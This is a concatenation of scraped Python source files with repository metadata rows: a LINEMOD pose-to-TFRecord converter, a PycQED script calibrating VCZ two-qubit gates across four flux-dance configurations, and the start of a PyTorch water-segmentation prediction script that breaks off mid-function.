out_img = cv2.imread(img_name)
encode_image = tf.compat.as_bytes(cv2.imencode(".png", out_img)[1].tostring())
# read init pose
it_obj_name_init = "%06d" % it_img + "_predict.npy"
init_pose_file = os.path.join(init_pose_folder_name, object_names[it_obj], it_obj_name_init)
predict_data = np.load(init_pose_file, allow_pickle='TRUE').item()
Rt_mat_init = predict_data["pose_pred"]
R_mat_init = np.matmul(Rt_mat_init[:3, :3], R_init)
quat_init = Quaternion.from_matrix(R_mat_init)
pos_init = Rt_mat_init[:, 3]
if np.isnan(pos_init[0]):
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
if np.linalg.norm(pos_init) > 10.0:
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
num_of_objects = 13
K_init_all = np.zeros((num_of_objects, 3, 3))
for it_img_obj in range(num_of_objects):
K_init_all[it_img_obj, :, :] = copy.copy(camera_intrinsic_matrix_real)
feature = {
"init_pose": tf.train.Feature(float_list=tf.train.FloatList(value=pos_init)),
"init_quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat_init)),
"cls_indexes": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes)),
"obj_num": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes_num)),
"pos": tf.train.Feature(float_list=tf.train.FloatList(value=pos.reshape(-1))),
"quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat.reshape(-1))),
"img": tf.train.Feature(bytes_list=tf.train.BytesList(value=[encode_image])),
"K_init_all": tf.train.Feature(float_list=tf.train.FloatList(value=K_init_all.reshape(-1))),
}
tf_record_example = tf.train.Example(features=tf.train.Features(feature=feature))
examples.append(tf_record_example)
if not (len(examples) == 0):
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
if __name__ == '__main__':
linemod_occlusion_folder = "../../resources/pvnet_data/OCCLUSION_LINEMOD"
linemod_folder = "../../resources/pvnet_data/LINEMOD"
out_folder = "../../resources/datasets"
init_pose_folder_name = "../../resources/pvnet_data/init_poses/occlusion"
proccess_real_data_occlusion_linemod(linemod_occlusion_folder, linemod_folder, init_pose_folder_name, out_folder,
each_object_separate=True)
init_pose_folder_name = "../../resources/pvnet_data/init_poses/linemod"
proccess_real_data_linemod(linemod_folder, init_pose_folder_name, out_folder, each_object_separate=True)
| 42.37276 | 141 | 0.583996 | 1,640 | 11,822 | 3.890854 | 0.103659 | 0.02194 | 0.023507 | 0.02006 | 0.854568 | 0.83827 | 0.832315 | 0.827457 | 0.816016 | 0.798307 | 0 | 0.033614 | 0.287853 | 11,822 | 278 | 142 | 42.52518 | 0.724314 | 0.004314 | 0 | 0.735294 | 0 | 0 | 0.060094 | 0.01649 | 0.004902 | 0 | 0 | 0 | 0 | 1 | 0.014706 | false | 0 | 0.029412 | 0 | 0.04902 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
016c5dbde1338450345a20e9a8f8e8d5a630898a | 20,772 | py | Python | pycqed/measurement/Simultaneous_fine_landscape.py | nuttamas/PycQED_py3 | 1ee35c7428d36ed42ba4afb5d4bda98140b2283e | [
"MIT"
] | 60 | 2016-08-03T10:00:18.000Z | 2021-11-10T11:46:16.000Z | pycqed/measurement/Simultaneous_fine_landscape.py | nuttamas/PycQED_py3 | 1ee35c7428d36ed42ba4afb5d4bda98140b2283e | [
"MIT"
] | 512 | 2016-08-03T17:10:02.000Z | 2022-03-31T14:03:43.000Z | pycqed/measurement/Simultaneous_fine_landscape.py | nuttamas/PycQED_py3 | 1ee35c7428d36ed42ba4afb5d4bda98140b2283e | [
"MIT"
] | 34 | 2016-10-19T12:00:52.000Z | 2022-03-19T04:43:26.000Z | ###########################################
# VCZ calibration (fine landscape) FLUX dance 1
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X3, flux_lm_D8,
flux_lm_D6, flux_lm_X2],
which_gate= ['NE', 'SW',
'SW', 'NE'],
fl_lm_park = [flux_lm_Z1, flux_lm_D7, flux_lm_Z4],
speed_limit = [2.9583333333333334e-08,
2.75e-08])
swf2.set_parameter(4)
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X1, flux_lm_D2],
which_gate= ['NE', 'SW'],
fl_lm_park = [flux_lm_D1],
speed_limit = [2.75e-08])
swf2.set_parameter(6)
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 2
## input from user
pairs = [['X3', 'D8'], ['D6', 'X2'], ['X1', 'D2']]
which_gate= [['NE', 'SW'],['SW', 'NE'], ['NE', 'SW']]
parked_qubits = ['D7', 'Z1', 'Z4', 'D1']
cfg_amps = [0.28500000000000003,0.19302332066356387,0.25166666666666665]
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'disable_metadata': True,
'flux_codeword': 'flux-dance-1',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.97, 1.03, 21))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 11))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
###########################################
# VCZ calibration (fine landscape) FLUX dance 2
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X3, flux_lm_D7,
flux_lm_D5, flux_lm_X2,
flux_lm_X1, flux_lm_D1],
which_gate= ['NW', 'SE',
'SE', 'NW',
'NW', 'SE'],
fl_lm_park = [flux_lm_Z1, flux_lm_D8, flux_lm_Z4, flux_lm_D2],
speed_limit = [2.9583333333333334e-08,
2.4166666666666668e-08,
2.5416666666666666e-08])
swf2.set_parameter(5)
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 2
## input from user
pairs = [['X3', 'D7'], ['D5', 'X2'], ['X1', 'D1']]
which_gate= [['NW', 'SE'],['SE', 'NW'], ['NW', 'SE']]
parked_qubits = ['D8', 'Z1', 'Z4', 'D2']
cfg_amps = [0.3242724012703858,0.16687470158591108,0.27975182997855896]
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'disable_metadata': True,
'flux_codeword': 'flux-dance-2',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.95, 1.05, 41))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 21))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
###########################################
# VCZ calibration (fine landscape) FLUX dance 3
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_D5, flux_lm_X3,
flux_lm_X2, flux_lm_D3],
which_gate= ['NW', 'SE',
'SE', 'NW'],
fl_lm_park = [flux_lm_Z1, flux_lm_Z4, flux_lm_D2],
speed_limit = [2.75e-08, 2.75e-8])
swf2.set_parameter(8)
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X4, flux_lm_D9],
which_gate= ['SE', 'NW'],
fl_lm_park = [flux_lm_D8],
speed_limit = [2.75e-8])
swf2.set_parameter(5)
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 3
pairs = [['X4', 'D9'], ['D5', 'X3'], ['X2', 'D3']]
which_gate= [['SE', 'NW'],['NW', 'SE'], ['SE', 'NW']]
parked_qubits = ['D8', 'Z1', 'Z4', 'D2']
cfg_amps = [] # input
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'disable_metadata': True,
'flux_codeword': 'flux-dance-3',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.95, 1.05, 41))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 21))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
###########################################
# VCZ calibration (fine landscape) FLUX dance 4
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X4, flux_lm_D8,
flux_lm_D4, flux_lm_X3],
which_gate= ['SW', 'NE',
'NE', 'SW'],
fl_lm_park = [flux_lm_D9, flux_lm_Z1, flux_lm_Z3],
speed_limit = [2.75e-08,
2.9583333333333334e-08]) # input
swf2.set_parameter(7) # input
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X2, flux_lm_D2],
which_gate= ['SW', 'NE'],
fl_lm_park = [flux_lm_D3],
speed_limit = [2.75e-08]) # input
swf2.set_parameter(3) # input
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 4
## input from user besides cfg amps & speedlimt & flux-danace code word
pairs = [['X4', 'D8'], ['D4', 'X3'], ['X2', 'D2']]
which_gate= [['SW', 'NE'],['NE', 'SW'], ['SW', 'NE']]
parked_qubits = ['D9', 'Z1', 'Z3', 'D3']
cfg_amps = [] # input
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'disable_metadata': True,
'flux_codeword': 'flux-dance-4',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.95, 1.05, 41))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 21))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis') | 45.552632 | 107 | 0.606201 | 2,777 | 20,772 | 4.153403 | 0.078862 | 0.057222 | 0.037454 | 0.058263 | 0.962719 | 0.944685 | 0.922924 | 0.915988 | 0.906711 | 0.898041 | 0 | 0.043256 | 0.256547 | 20,772 | 456 | 108 | 45.552632 | 0.70362 | 0.03134 | 0 | 0.845144 | 0 | 0 | 0.122612 | 0.054314 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.010499 | 0 | 0.010499 | 0.010499 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
016e9661e0c32507832c9a9ddeb1bd2e6a4f9777 | 28,460 | py | Python | main.py | IewNixIl/graduation_project_under | 67d0345208511bb06c35c3453227b2fa4ebef4a3 | [
"MIT"
] | null | null | null | main.py | IewNixIl/graduation_project_under | 67d0345208511bb06c35c3453227b2fa4ebef4a3 | [
"MIT"
] | null | null | null | main.py | IewNixIl/graduation_project_under | 67d0345208511bb06c35c3453227b2fa4ebef4a3 | [
"MIT"
] | null | null | null | from Config import config
from train import train
from test import testTools,getimg,getlabel_low
import numpy
from DATA import WaterDataset
import Networks
from torchvision import transforms as T
from torch.utils.data import DataLoader
from matplotlib import pyplot
import os
from PIL import Image
import time
import util
from utils import correct_merge
from multiprocessing import Process
import torch
def predict_seg_merge_mask(models,n_ite,thres,ifrun=[True,True,True]):
path_models='D:\\codes\\Graduation\\MODELS'
subs=['train_sub1','train_sub2','train_sub3']#subs 和 models 对应
path='D:\\result\\train_result'
transform_img=config.transform_img
transform_label=config.transform_label
model1=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
path_model=path_models+'\\'+models[0]
#加载模型
model1.load(path_model)
if config.use_gpu:#使用gpu
model1=model1.cuda()
model2=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
path_model=path_models+'\\'+models[1]
#加载模型
model2.load(path_model)
if config.use_gpu:#使用gpu
model2=model2.cuda()
model3=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
path_model=path_models+'\\'+models[2]
#加载模型
model3.load(path_model)
if config.use_gpu:#使用gpu
model3=model3.cuda()
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader1=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader2=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader3=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
if ifrun[0]:
name_merge='predict_'+str(n_ite)+'_sub1_merge'
name_mask='predict_'+str(n_ite)+'_sub1_mask'
path_merge=path+'\\'+str(n_ite)+'ite'+'\\'+name_merge
path_mask=path+'\\'+str(n_ite)+'ite'+'\\'+name_mask
if not os.path.exists(path_merge):
os.makedirs(path_merge)
if not os.path.exists(path_mask):
os.makedirs(path_mask)
for i,data in enumerate(test_dataloader1,0):
inputs,labels,name=data#获得输入和标签
if config.use_gpu:#使用gpu
inputs=inputs.cuda()
merge=(torch.where(model1(inputs)>torch.tensor(thres[0]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model2(inputs)>torch.tensor(thres[1]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model3(inputs)>torch.tensor(thres[2]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda()))/torch.tensor([3]).cuda()
merge=numpy.array(merge[0,0,:,:].cpu().detach())
mask=numpy.where(numpy.where(merge==1,True,False)+numpy.where(merge==0,True,False),1,0)
Image.fromarray((merge*255).astype(numpy.uint8)).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_merge+'\\'+name[0])
Image.fromarray(mask).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_mask+'\\'+name[0])
if i%1000==0:
print(i)
if ifrun[1]:
name_merge='predict_'+str(n_ite)+'_sub2_merge'
name_mask='predict_'+str(n_ite)+'_sub2_mask'
path_merge=path+'\\'+str(n_ite)+'ite'+'\\'+name_merge
path_mask=path+'\\'+str(n_ite)+'ite'+'\\'+name_mask
if not os.path.exists(path_merge):
os.makedirs(path_merge)
if not os.path.exists(path_mask):
os.makedirs(path_mask)
for i,data in enumerate(test_dataloader2,0):
inputs,labels,name=data#获得输入和标签
if config.use_gpu:#使用gpu
inputs=inputs.cuda()
merge=(torch.where(model1(inputs)>torch.tensor(thres[0]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model2(inputs)>torch.tensor(thres[1]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model3(inputs)>torch.tensor(thres[2]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda()))/torch.tensor([3]).cuda()
merge=numpy.array(merge[0,0,:,:].cpu().detach())
mask=numpy.where(numpy.where(merge==1,True,False)+numpy.where(merge==0,True,False),1,0)
Image.fromarray((merge*255).astype(numpy.uint8)).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_merge+'\\'+name[0])
Image.fromarray(mask).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_mask+'\\'+name[0])
if i%1000==0:
print(i)
if ifrun[2]:
name_merge='predict_'+str(n_ite)+'_sub3_merge'
name_mask='predict_'+str(n_ite)+'_sub3_mask'
path_merge=path+'\\'+str(n_ite)+'ite'+'\\'+name_merge
path_mask=path+'\\'+str(n_ite)+'ite'+'\\'+name_mask
if not os.path.exists(path_merge):
os.makedirs(path_merge)
if not os.path.exists(path_mask):
os.makedirs(path_mask)
for i,data in enumerate(test_dataloader3,0):
inputs,labels,name=data#获得输入和标签
if config.use_gpu:#使用gpu
inputs=inputs.cuda()
merge=(torch.where(model1(inputs)>torch.tensor(thres[0]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model2(inputs)>torch.tensor(thres[1]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model3(inputs)>torch.tensor(thres[2]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda()))/torch.tensor([3]).cuda()
merge=numpy.array(merge[0,0,:,:].cpu().detach())
mask=numpy.where(numpy.where(merge==1,True,False)+numpy.where(merge==0,True,False),1,0)
Image.fromarray((merge*255).astype(numpy.uint8)).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_merge+'\\'+name[0])
Image.fromarray(mask).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_mask+'\\'+name[0])
if i%1000==0:
print(i)
def predict_all(models,n_ite,ifrun):
'''已有三个sub数据
三个训练好的模型
生成九个预测 (相互交叉)
'''
path_models='D:\\codes\\Graduation\\MODELS'
#models=['model35','model36','model37']
subs=['train_sub1','train_sub2','train_sub3']#subs 和 models 对应
#n_ite=1#从1开始计数
path_pre='D:\\result\\train_result'
transform_img=config.transform_img
transform_label=config.transform_label
#模型设置
model=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
if ifrun[0]:
'''model1 预测sub1 sub2 sub3'''
path_model=path_models+'\\'+models[0]
#加载模型
model.load(path_model)
if config.use_gpu:#使用gpu
model=model.cuda()
#sub1
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub1_model1'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
